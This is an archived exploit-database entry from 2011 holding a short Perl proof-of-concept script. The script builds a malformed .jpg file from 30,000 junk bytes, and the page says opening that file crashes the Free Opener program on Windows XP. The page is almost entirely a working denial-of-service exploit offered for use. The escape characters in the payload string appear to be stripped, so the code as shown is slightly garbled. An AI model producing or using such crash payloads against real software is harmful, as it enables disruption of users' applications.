[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Free Opener Local Denial of Service
# Published : 2011-12-09
# Author :
# Previous Title : Typsoft FTP Server 1.10 Multiple Commands DoS
# Next Title : Novell GroupWise Messenger Client <= 2.1.0 Unicode Stack Overflow


#!/usr/bin/perl

# Exploit Title:  Free Opener Local Denial of Service
# Date: 09-12-11
# Author: Iolo Morganwg
# Download: http://dl.installiq.com/download/downloadpop.aspx?shortname=freeopener&a=13193&f=FO-Main
# Tested on: Windows XP SP3

#To trigger: Run script open with Free opener, program dies!.

my $file= "crash25000.jpg";
my $junk = "x41" x 30000;
# my $junk2 = "x42" x 5000;

open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);

print "File Created successfullyn";